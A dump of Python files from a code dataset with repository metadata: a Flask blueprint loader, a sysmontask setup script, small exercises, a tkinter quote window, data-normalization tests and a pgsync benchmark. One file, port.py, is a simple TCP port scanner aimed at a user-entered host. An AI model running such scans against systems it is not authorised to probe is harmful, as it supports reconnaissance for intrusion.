# coding: utf-8
from flask import Flask
import mysql,os,re
from mysql import Pool
import properties
# Define the WEB application container (and keep JSON responses from being ASCII-escaped)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
# Handle auto-injection across the modules and assemble the blueprints.
# dir_path is the blueprint module path; e.g. if the blueprints live in the routes folder, pass '/routes'.
def map_apps(dir_path):
path=os.getcwd()+dir_path
list=os.listdir(path)
    print('Blueprint folder:', '.', dir_path)
# list.remove('__pycache__')
while list:
try:
file=list.pop(0)
if file.startswith('__') and file.endswith('__'):
continue
            print('Loading blueprint module:', file)
f_model=__import__(re.sub('/','',dir_path)+'.'+re.sub('\.py','',file),fromlist=True)
app.register_blueprint(f_model.app)
except:
pass
def get_app():
return app
print('Loading database module')
mysql.pool = Pool.Pool()
# print('Loading finished')
print('Initializing blueprints')
for path in properties.blueprint_path:
map_apps(path)
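# Illustrative sketch only (not part of this repository): a minimal blueprint module,
# e.g. routes/health.py, that map_apps() above could discover and register. It only
# needs to expose a flask.Blueprint object named `app`, matching f_model.app:
#
#   from flask import Blueprint, jsonify
#
#   app = Blueprint('health', __name__, url_prefix='/health')
#
#   @app.route('/ping')
#   def ping():
#       return jsonify({'status': 'ok'})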
| 258
| 0
| 0
| 0
| 0
| 479
| 0
| 6
| 45
|
84eea4a37f53204b935d3f1eece7e1963b816b5c
| 1,893
|
py
|
Python
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | 1
|
2021-05-20T09:31:26.000Z
|
2021-05-20T09:31:26.000Z
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='[email protected]',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 39.4375
| 159
| 0.692552
|
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
def get_data_files():
data_files = [('/usr/share/sysmontask/glade_files', ['glade_files/disk.glade','glade_files/diskSidepane.glade','glade_files/gpu.glade',
'glade_files/gpuSidepane.glade','glade_files/net.glade','glade_files/netSidepane.glade','glade_files/sysmontask.glade','glade_files/filter_dialog.glade']),
('/usr/share/sysmontask/icons',['icons/SysMonTask.png']),
('/usr/share/doc/sysmontask',['AUTHORS', 'README.md','LICENSE']),
('/usr/share/applications',['SysMonTask.desktop']),
('/usr/share/glib-2.0/schemas',['com.github.camelneeraj.sysmontask.gschema.xml'])
]
return data_files
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='[email protected]',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 0
| 0
| 0
| 0
| 0
| 603
| 0
| 0
| 23
|
210a678a3c714cdead1544323597dcdb1cff8f70
| 323
|
py
|
Python
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 2
|
2021-12-22T07:43:14.000Z
|
2021-12-24T12:07:33.000Z
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | null | null | null |
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 1
|
2021-12-22T07:43:26.000Z
|
2021-12-22T07:43:26.000Z
|
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 24.846154
| 54
| 0.616099
|
def non_start(str1, str2):
if len(str1) >= 1 and len(str2) >= 1:
newstr = str1[1:len(str1)] + str2[1:len(str2)]
return newstr
else:
return False
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 0
| 0
| 0
| 0
| 0
| 155
| 0
| 0
| 22
|
a1b5ff50c9c782fea188c9b6fb9e25d0a0c8232c
| 705
|
py
|
Python
|
port.py
|
hawk-0fcx/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | 1
|
2022-03-12T11:33:16.000Z
|
2022-03-12T11:33:16.000Z
|
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
import socket
import os
os.system("clear")
from colorama import Fore
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "PLEASE ENTER THE IP ADDRESS: ")
port = int(input(Fore.RED + "ENTER THE PORT NUMBER TO SCAN: "))
portScanner(port)
| 26.111111
| 68
| 0.537589
|
import socket
import os
os.system("clear")
import colorama
from colorama import Fore, Back, Style, init
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "PLEASE ENTER THE IP ADDRESS: ")
port = int(input(Fore.RED + "ENTER THE PORT NUMBER TO SCAN: "))
def portScanner(port):
    if s.connect_ex((host, port)):
        print(Fore.GREEN + "THIS PORT IS CLOSED")
    else:
        print(Fore.GREEN + "THIS PORT IS OPEN")
portScanner(port)
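# Illustrative extension (not in the original script): scan an inclusive port range,
# opening a fresh socket per port so one connection attempt cannot affect the next.
def scan_range(target_host, first_port, last_port):
    open_ports = []
    for p in range(first_port, last_port + 1):
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        probe.settimeout(1)
        if probe.connect_ex((target_host, p)) == 0:  # 0 means the TCP connection succeeded
            open_ports.append(p)
        probe.close()
    return open_ports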
| 26
| 0
| 0
| 0
| 0
| 133
| 0
| 13
| 45
|
09bff90f642cffe4743a7a3613eb947ba5cade52
| 156
|
py
|
Python
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 341
|
2018-04-26T08:46:05.000Z
|
2022-03-01T08:13:39.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 24
|
2020-09-30T19:57:14.000Z
|
2021-10-05T07:21:09.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 128
|
2018-05-07T07:30:29.000Z
|
2022-02-19T17:53:39.000Z
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
| 78
| 90
| 0.788462
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
15c549b448318131afb3c0205f8085e21f227080
| 9,494
|
py
|
Python
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 41
|
2015-05-21T21:12:26.000Z
|
2022-02-17T17:23:14.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 63
|
2015-05-15T10:25:55.000Z
|
2021-02-23T04:51:17.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 12
|
2015-06-12T11:52:08.000Z
|
2020-09-23T10:40:59.000Z
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
execute(None,doit, argspec)
| 48.192893
| 123
| 0.425637
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
import os,sys
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
def doit(args) :
global file
action = args.action
params = args.paramsobj
logger=params.logger
varlist = ['url', 'copyright', 'license', 'author', 'version']
copyrightpre = 'Copyright (c) '
copyrightpost = ' SIL International (http://www.sil.org)'
standards = {
'copyright': copyrightpre + cyear + copyrightpost,
'version': params.sets['default']['version'],
'url': 'http://github.com/silnrsi/pysilfont',
'license': 'Released under the MIT License (http://opensource.org/licenses/MIT)'}
pythonfiles = {}
otherfiles = []
for subdir, dirs, files in os.walk("."):
if not (subdir=="." or subdir[0:5] in ("./lib","./scr")) : continue
if subdir[0:] == "./lib/pysilfont.egg-info" : continue
for filen in files:
if filen[-1:]=="~" : continue
if filen[-3:]=="pyc" : continue
if filen in ("__init__.py", "ez_setup.py") : continue
needver = (True if filen in ('setup.py', 'param.py') else False)
fulln = os.path.join(subdir,filen)
file = open(fulln,"r")
line1 = nextline()
pyline1 = (True if line1 in ("#!/usr/bin/env python", "#!/usr/bin/python") else False)
if pyline1 or filen[-3:] == ".py" :
# Look for standard headers
headererror = []
headers = "#!/usr/bin/env python"
if pyline1 :
# Read description which may be single or multiline
line = nextline()
headers = headers + "\n"+line
if line[0:3] == "'''" :
while line[-3:] != "'''" :
line = nextline()
if line =="EOF" : break # Must be EOF
headers = headers + "\n"+line
if line =="EOF" : headererror.append("No closing ''' to description")
elif line[0:1] != "'" : headererror.append("No description")
if headererror :
for line in headererror : logger.log(fulln + ": "+line,"E")
continue
# Read header variables
headvar={}
line = nextline()
while line[0:2] == "__" :
endn = line.find("__ = '")
if endn == -1 : std = headererror.append("Invalid variable line: " + line)
varn = line[2:endn]
val = line[endn+6:-1]
headvar[varn] = val
line = nextline()
# Check header variables
updatevars = {}
reportvars = {}
author = None
for varn in varlist :
if varn in headvar:
headval = headvar[varn]
if varn == 'author' : # Simply use existing author
author = headval
elif varn == "version" and not needver :
updatevars[varn] = "deleted"
elif varn == "copyright" : # Need to check dates and use oldest
# Find existing dates, assuming format 20nn and one or two dates
cdate = cyear
valid = True
datpos = headval.find("20")
if datpos != -1 :
# read any more digits
cdate='20'
nextpos = datpos+2
while headval[nextpos] in '0123456789' and nextpos < len(headval) :
cdate = cdate + headval[nextpos]
nextpos += 1
# Look for second date
rest = headval[nextpos:]
datpos = rest.find("20")
date2 = ""
if datpos != -1 :
date2 = '20'
nextpos = datpos+2
while rest[nextpos] in '0123456789' and nextpos < len(rest) :
date2 = date2 + rest[nextpos]
nextpos += 1
cval=int(cdate)
if cval < 2000 or cval > int(cyear) : valid = False
if date2 != "" :
val2 = int(date2)
if val2 < cval or val2 > int(cyear) : valid = False
if not valid : cdate = cyear
copyright = copyrightpre + cdate + copyrightpost
if headval != copyright :
updatevars[varn] = ("updated" if valid else "update (invalid dates)")
else :
if headval != standards[varn] :
updatevars[varn] = "updated"
else :
if varn == 'author' :
reportvars[varn] = "no author"
elif varn == "version" and not needver :
pass
else:
updatevars[varn] ="added"
for varn in headvar:
if varn not in varlist: reportvars[varn] = "non-standard"
else :
logger.log( fulln + ": " + "No python header - first line is " + line1, "E")
continue
else :
otherfiles.append(fulln)
continue
# Now have python file with no errors, so can update headers
if action == 'update' and updatevars :
logger.log("Updating "+fulln,"P")
outfile = open("update_headers_temp.txt", "w")
outfile.write(headers + "\n")
for varn in varlist :
if varn == "version" and not needver :
pass
elif varn == "author" :
if author : outfile.write("__author__ = '" + author + "'\n")
elif varn == "copyright" :
outfile.write("__copyright__ = '" + copyright + "'\n")
else:
outfile.write("__" + varn + "__ = '" + standards[varn] + "'\n")
if varn in updatevars :
reason = updatevars[varn]
if reason == "no author" :
logger.log("No author header variable ", "I")
else :
logger.log("Header variable " + varn + " " + reason, "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
outfile.write("__" + varn + "__ = '" + headvar[varn] + "'\n")
logger.log("Non-standard header variable " + varn + " retained", "W")
else:
logger.log("No author header variable", "I")
# Write the rest of the file
outfile.write(line + "\n") # last line read checking headers
for line in file: outfile.write(line)
outfile.close()
file.close()
os.rename(fulln, fulln+"~")
os.rename("update_headers_temp.txt",fulln)
else :
for varn in updatevars :
logger.log(fulln + ": Header variable " + varn + " will be " + updatevars[varn], "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
logger.log(fulln + ": Non-standard header variable " + varn + " present", "W")
else:
logger.log(fulln + ": No author header variable", "I")
print "\n"+"Non-python files"+"\n"
for filen in otherfiles:
print filen
return
def nextline() :
global file
line = file.readline()
line = ("EOF" if line == "" else line.strip())
return line
execute(None,doit, argspec)
| 0
| 0
| 0
| 0
| 0
| 8,728
| 0
| -8
| 68
|
83d2715a3c28310e7a615f390760361ca9c50fc6
| 1,976
|
py
|
Python
|
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
import atexit
import logging
logger = logging.getLogger(__name__)
atexit.register(_close_executors)
del _close_executors
| 30.875
| 97
| 0.674089
|
import atexit
import logging
from inspect import isclass
from .common_executors import BaseExecutor
from .externel_executors import ExternalExecutorFabric
from .java import *
from .operations import Operation, Operations
from .python import *
from ..utils import isstring
logger = logging.getLogger(__name__)
class BaseTarget(object):
def __init__(self, executor):
self.executor = executor
class Target(BaseTarget):
_executors_pool = {}
def __init__(self, target, target_name=None, env=None):
"""Factory class for building executors
:param Callable|str target: a native object or a path to an external file, which contains
the structure to be tested
:param str target_name: if target is a path, this indicates the name of the structure to
test
:param str env: environment of the target, usually just the language name itself
"""
executor_id = (target, target_name)
if executor_id not in self._executors_pool:
# Find the corresponding executor
if isstring(target):
cls = ExternalExecutorFabric.get(env) or ExternalExecutorFabric.guess(target)
executor = cls(target, target_name)
elif callable(target):
executor = (ClassExecutor if isclass(target) else FunctionExecutor)(target)
else:
raise TypeError('Target is not a callable nor str')
self._executors_pool[executor_id] = executor
super(Target, self).__init__(self._executors_pool[executor_id])
@classmethod
def close(cls):
for executor_id, e in list(cls._executors_pool.items()):
target, _ = executor_id
logger.debug('Executor %s on %s closed', e.ENVIRONMENT, target)
e.close()
del cls._executors_pool[executor_id]
def _close_executors():
Target.close()
atexit.register(_close_executors)
del _close_executors
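# Illustrative usage (hypothetical call site; the surrounding test framework defines the
# real ones): executors are cached per (target, target_name), so constructing a second
# Target for the same callable reuses the same executor instance.
#
#   def solution(x):
#       return x * 2
#
#   t1 = Target(solution)
#   t2 = Target(solution)
#   assert t1.executor is t2.executor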
| 0
| 259
| 0
| 1,256
| 0
| 21
| 0
| 89
| 224
|
5855a718f19fd271a7d90653c654f8cb39f399af
| 83
|
py
|
Python
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 1
|
2015-08-27T13:03:27.000Z
|
2015-08-27T13:03:27.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 22
|
2015-08-23T18:17:30.000Z
|
2015-09-16T13:38:36.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | null | null | null |
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 13.833333
| 27
| 0.53012
|
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
ca4f6f3248cffb86968c72e3aaf6cc6ec45f47c6
| 430
|
py
|
Python
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | 2
|
2022-01-01T19:31:56.000Z
|
2022-01-01T19:32:54.000Z
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
dias = int(input("Enter the number of days to convert to seconds: "))
horas = int(input("Enter the number of hours to convert to seconds: "))
minutos = int(input("Enter the number of minutes to convert to seconds: "))
segundos = int(input("Enter the seconds to add to the values above: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total of days, hours, minutes and seconds entered: " + str(segundos) + " seconds")
| 71.666667
| 101
| 0.711628
|
dias = int(input("Enter the number of days to convert to seconds: "))
horas = int(input("Enter the number of hours to convert to seconds: "))
minutos = int(input("Enter the number of minutes to convert to seconds: "))
segundos = int(input("Enter the seconds to add to the values above: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total of days, hours, minutes and seconds entered: " + str(segundos) + " seconds")
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
c06c9c6d5402fedf403bcb579088899fc6cd9baf
| 748
|
py
|
Python
|
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 39.368421
| 165
| 0.71123
|
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
57bdb73e1704842d0766817fd5391f99486fe936
| 2,062
|
py
|
Python
|
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
"""Test normalizing gesture recording data."""
SAMPLES_PER_RECORDING = 160
| 54.263158
| 113
| 0.727934
|
"""Test normalizing gesture recording data."""
import os
import numpy as np
from iotai_sensor_classification.recording import read_recordings
from iotai_sensor_classification.normalization import normalize_mean_std_dict
from data.gestures import linear_accelerometer
from iotai_sensor_classification.plot_util import column_histograms, plot_columns, \
plot_lines, histogram_overlay
SAMPLES_PER_RECORDING = 160
def test_normalize_gesture_data():
recordings_dir = os.path.dirname(linear_accelerometer.__file__)
raw_gestures = read_recordings(recordings_dir=recordings_dir)
normalized_gestures = normalize_mean_std_dict(raw_gestures)
test_output = os.path.join("test_output", "gestures", "normalized")
os.makedirs(test_output, exist_ok=True)
for gesture in normalized_gestures.keys():
normalized = normalized_gestures[gesture]
column_histograms(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-histograms.png"))
plot_columns(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-plots.png"))
motion_measures = normalized.drop(columns=['time', 'label'])
plot_lines(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-lines.png"))
plot_lines(motion_measures, name=f"{gesture} normalized window={SAMPLES_PER_RECORDING}",
filepath=os.path.join(test_output, f"{gesture}-norm-lines-window{SAMPLES_PER_RECORDING}.png"),
vertical_tick_spacing=SAMPLES_PER_RECORDING)
histogram_overlay(motion_measures, name=f"{gesture} normalized measurements",
filepath=os.path.join(test_output, f"{gesture}-norm-over-hist.png"))
# https://numpy.org/doc/stable/reference/generated/numpy.allclose.html
assert np.allclose(normalized.mean(), 0.0)
assert np.allclose(normalized.std(), 1.0)
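# Illustrative reference only -- NOT the library implementation: a plausible
# normalize_mean_std_dict, assuming it z-scores every numeric column of every
# recording, which is what the allclose assertions above require.
def _reference_normalize_mean_std_dict(recordings):
    normalized = {}
    for name, frame in recordings.items():
        frame = frame.copy()
        numeric = frame.select_dtypes(include="number").columns
        frame[numeric] = (frame[numeric] - frame[numeric].mean()) / frame[numeric].std()
        normalized[name] = frame
    return normalized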
| 0
| 0
| 0
| 0
| 0
| 1,621
| 0
| 207
| 156
|
fb9c84f69582b895624fd919a820ac62d428a59c
| 4,791
|
py
|
Python
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-09-26T21:05:37.000Z
|
2019-09-26T21:05:37.000Z
|
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | null | null | null |
examples/book_view/benchmark.py
|
toluaina/essync
|
4a0119d99760eaa193f4ae60abd2b5f38482b280
|
[
"BSD-3-Clause"
] | 1
|
2019-08-27T16:19:09.000Z
|
2019-08-27T16:19:09.000Z
|
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
if __name__ == "__main__":
main()
| 29.757764
| 77
| 0.529743
|
import json
from random import choice
from typing import Set
import click
import sqlalchemy as sa
from faker import Faker
from schema import Book
from sqlalchemy.orm import sessionmaker
from pgsync.base import pg_engine
from pgsync.constants import DELETE, INSERT, TG_OP, TRUNCATE, UPDATE
from pgsync.utils import get_config, show_settings, Timer
FIELDS = {
"isbn": "isbn13",
"title": "sentence",
"description": "text",
"copyright": "word",
}
def insert_op(session: sessionmaker, model, nsize: int) -> None:
faker: Faker = Faker()
rows: Set = set([])
for _ in range(nsize):
kwargs = {}
for column in model.__table__.columns:
if column.foreign_keys:
foreign_key = list(column.foreign_keys)[0]
pk = [
column.name
for column in foreign_key.column.table.columns
if column.primary_key
][0]
fkey = (
session.query(foreign_key.column.table)
.order_by(sa.func.random())
.limit(1)
)
value = getattr(fkey[0], pk)
kwargs[column.name] = value
elif column.primary_key:
continue
else:
field = FIELDS.get(column.name)
if not field:
# continue
raise RuntimeError(f"field {column.name} not in mapping")
value = getattr(faker, field)()
kwargs[column.name] = value
print(f"Inserting {model.__table__} VALUES {kwargs}")
row = model(**kwargs)
rows.add(row)
with Timer(f"Created {nsize} {model.__table__} in"):
try:
session.add_all(rows)
session.commit()
except Exception as e:
print(f"Exception {e}")
session.rollback()
def update_op(session: sessionmaker, model, nsize: int) -> None:
column: str = choice(list(FIELDS.keys()))
if column not in [column.name for column in model.__table__.columns]:
raise RuntimeError()
faker: Faker = Faker()
with Timer(f"Updated {nsize} {model.__table__}"):
for _ in range(nsize):
field = FIELDS.get(column)
value = getattr(faker, field)()
row = (
session.query(model)
.filter(getattr(model, column) != value)
.order_by(sa.func.random())
.limit(1)
)
if row:
print(f'Updating {model.__table__} SET {column} = "{value}"')
try:
setattr(row[0], column, value)
session.commit()
except Exception as e:
session.rollback()
def delete_op(session: sessionmaker, model, nsize: int) -> None:
with Timer(f"Deleted {nsize} {model.__table__}"):
for _ in range(nsize):
row = session.query(model).order_by(sa.func.random()).limit(1)
pk = [
column.name
for column in filter(
lambda x: x.primary_key, model.__table__.columns
)
][0]
if row:
try:
value = getattr(row[0], pk)
print(f"Deleting {model.__table__} WHERE {pk} = {value}")
session.query(model).filter(
getattr(model, pk) == value
).delete()
session.commit()
except Exception as e:
session.rollback()
@click.command()
@click.option(
"--config",
"-c",
help="Schema config",
type=click.Path(exists=True),
)
@click.option("--daemon", "-d", is_flag=True, help="Run as a daemon")
@click.option("--nsize", "-n", default=5000, help="Number of samples")
@click.option(
"--tg_op",
"-t",
help="TG_OP",
type=click.Choice(
TG_OP,
case_sensitive=False,
),
)
def main(config, nsize, daemon, tg_op):
show_settings()
config: str = get_config(config)
documents: dict = json.load(open(config))
engine = pg_engine(
database=documents[0].get("database", documents[0]["index"])
)
Session = sessionmaker(bind=engine, autoflush=False, autocommit=False)
session = Session()
model = Book
func = {
INSERT: insert_op,
UPDATE: update_op,
DELETE: delete_op,
}
# lets do only the book model for now
while True:
if tg_op:
func[tg_op](session, model, nsize)
else:
func[choice(TG_OP)](session, model, nsize)
if not daemon:
break
if __name__ == "__main__":
main()
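# Example invocation (hypothetical paths/values, for illustration only):
#   python benchmark.py --config examples/book_view/schema.json --tg_op INSERT --nsize 100
# Omitting --tg_op picks a random operation each round; --daemon keeps the loop running.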
| 0
| 1,070
| 0
| 0
| 0
| 3,123
| 0
| 105
| 336
|
b388ad646acdaff30e3ae11dca9c423ac5dc3c80
| 794
|
py
|
Python
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 2
|
2016-09-14T12:31:40.000Z
|
2018-05-25T02:45:37.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | 1
|
2017-04-13T16:24:59.000Z
|
2017-04-18T19:30:08.000Z
|
resources/ArchivesSpace post-migration scripts/TitleCapitalization.py
|
smith-special-collections/aspace-migration
|
